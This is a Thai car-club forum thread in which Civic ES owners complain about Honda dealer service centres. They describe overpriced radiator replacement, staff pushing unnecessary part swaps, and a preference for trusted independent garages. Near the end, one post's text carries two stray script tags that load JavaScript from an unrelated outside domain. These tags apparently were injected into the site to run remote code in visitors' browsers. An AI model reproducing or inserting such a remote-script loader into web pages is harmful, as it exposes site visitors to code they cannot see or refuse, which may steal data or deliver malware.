ผมเคยเปลี่ยนท่อยางหม้อน้ำข้างบนเพื่อนผมดึงออกมาปรากฎว่าคอท่อยางแตกเลยครับ
เพราะมันกรอบมากๆเช็คราคาหม้อน้ำแล้วของศูนย์ราคา 4พันกว่าครับ เพื่อนผมเลยถามหัวหน้าช่าง
เขาบอกว่าให้สั้งจากร้านหม้อน้ำข้างนอกเป็นหม้อน้ำสองช่องตีใหม่ทั้งใบ(ของศูนย์ช่องเดียวข้างบนเป็นพลาสติก)
ราคาถูกกว่ามากและระบายความร้อนได้ดีกว่าซะอีก
ได้รับคำขอบคุณจาก: Jarkapong  hacker  okuma  Phetcharat 
rockarythm


เข้าร่วม: 06 มกรา 2010
ตอบ: 54

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 29
ให้คำขอบคุณ: 1
ศุกร์, 26 กุมภา 2010 22:34 - ศูนย์บริการ Honda!
wutdy พิมพ์ว่า:
ดีที่ยังไม่เคยเจอ ผมเช็คที่ ศูนย์รัตนาธิเบศ อะ


เดี๋ยวคงได้ไปใช้บริการศูนย์นี้ด้วยครับ บ้านใกล้

ผมจะดูที่เว็บ Honda ครับ เค้าจะมีรายการบอกว่า กี่กิโล เช็คอะไรบ้าง อันไหนซื้อเปลี่ยนเองได้ ก็จัดการให้อู่นอกที่ไว้ใจทำให้ ประหยัดดีครับ
ได้รับคำขอบคุณจาก: Jarkapong  hacker 
tamy2975


เข้าร่วม: 30 ตุลา 2009
ตอบ: 1733

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1615
ให้คำขอบคุณ: 1210
จันทร์, 21 มีนา 2011 22:43 - ศูนย์บริการ Honda!
เลิกเข้าไปนาน
ได้รับคำขอบคุณจาก: hacker  Jarkapong 
-ake_ipc-


เข้าร่วม: 01 ตุลา 2008
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 209
ให้คำขอบคุณ: 306

ที่อยู่: รามอินทรา109
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 21 มีนา 2011 23:14 - ศูนย์บริการ Honda!
ผมมองว่าที่เป็นแบบนี้เพราะตอนนี้มันไม่มีศูนย์ใหญ่ของฮอนด้าโดยตรงแล้ว

ที่เราเห็นทุกวันนี้ก็เป็นดิลเลอร์ทุกที่

เรื่องคุณภาพเลยดูด้อยลงไปแต่ศูนย์ที่ดีผมก้อว่ามีเยอะอยู่
ได้รับคำขอบคุณจาก: hacker  Jarkapong 
wichai


ชื่อเล่น: ป๊อป

เข้าร่วม: 26 มกรา 2011
ตอบ: 500

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 186
ให้คำขอบคุณ: 524

ที่อยู่: มาบข่า, ระยอง,ชุมพร
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 22 มีนา 2011 07:46 - ศูนย์บริการ Honda!
ได้รับคำขอบคุณจาก: hacker  Jarkapong 
hacker


ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ที่อยู่: BKK <--> CNX
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 22 มีนา 2011 09:14 - ศูนย์บริการ Honda!
Honda ลาดกระบัง เห็นรถผมเข้าไปแทบชักดิ้นชักงอกัน โดนไปเยอะ...
ได้รับคำขอบคุณจาก: Jarkapong 
maxch


เข้าร่วม: 13 สิงหา 2009
ตอบ: 2190

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1513
ให้คำขอบคุณ: 2530

ที่อยู่: อยุธยา-สระบุรี
ปี: 2003
อังคาร, 22 มีนา 2011 10:10 - ศูนย์บริการ Honda!
เก็บข้อมูล
ได้รับคำขอบคุณจาก: Jarkapong 
etabb


ชื่อเล่น: อีตาบีบี

เข้าร่วม: 02 เมษา 2010
ตอบ: 797

Guru ES
Guru ES

ได้รับคำขอบคุณ: 2637
ให้คำขอบคุณ: 1611

ที่อยู่: ลาดพร้าว
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 22 มีนา 2011 11:19 - ศูนย์บริการ Honda!
ศูนย์ส่วนใหญ่มันจะบอกให้เปลี่ยนอย่างเดียวเห็นอะไรที่เป็นนิดเป็นหน่อยมันก็จะให้เปลี่ยนลูกเดียว ทั้งๆที่อายุงานยังให้ได้อีกนานแสนนาน ถ้าคนใช้รถไม่พอมีความรู้บ้าง พนักงานบางคนบอกให้เปลี่ยนๆ อะไรก็เปลี่ยน นั้นแหละพนักงานคนนั้นจะชอบมากและจะมารับรถเราดูแลเราเป็นอย่างดี ผมเคยแล้วผมได้ซื้อเจ้า es ต่อมาจากเจ้าของเดิมคือเจ้าของเดิมออกแนวจะเป็นคนมีตัง แบบว่าเข้าศูนย์ตลอดพนักงานให้เปลี่ยนอะไรแบบว่ากูเปลี่ยนหมดทุกอย่างโดยไม่ไปดูว่ามันเสียจิงหรือเปล่า พอถึงตาที่ผมได้เป็นเจ้าของแทนผมก็เข้าศูนย์ตามเจ้าของเก่าเค้าหมดเพราะเห็นว่ารถคันนี้ ชั่งคนนี้ ศูนย์นี้ดูเเละคนนั้นนี้มาตลอด คงรู้แล้วเข้าใจคนคันนี้ที่สุด แต่ผมจาต่างกับเจ้าของเก่าที่ว่าพนักงานคนที่ประจบคนนี้บอกผมให้เปลี่ยนอะไร ผมจาดูก่อนถ้ามันไม่จำเป็นและไม่ถึงขนาดอันตรายจิงๆ ผมก็ยังไม่เปลี่ยน ซึ่งพอเห็นผมไม่สปอร์ตแบบนี้หลายๆครั้ง "เวลาผมเข้าไปทุกวันนี้มันไม่มาดูแลรถคันนี้และดูแลผมอีกเลย มองหน้าผมมันยังไม่มองเลยครับ" ประสบการณ์ยกตัวอย่างเรื่องหลอดไฟไฟเลี้ยว มันมองแค่ว่าดูแล้วหมองๆ มันบอกควรจะเปลี่ยนนะคับ แต่ผมสังเกตุแล้วไส้มันก็ไม่ได้ดำอะไร มันบอกว่าระวังขาด รู้ไหมว่ามันบอกผม ต้นปีมกราคมที่แล้ว ทุกวันนี้หลอดไฟผมก็ยังใช้ได้อยู่หลอดไม่เห็นจาขาด T_T สงสัยคนเก่าคงโดนมันกินตังไปเยอะนะผมว่า.... (ในความคิดผมนะครับ ^ ^) "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: Jarkapong 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.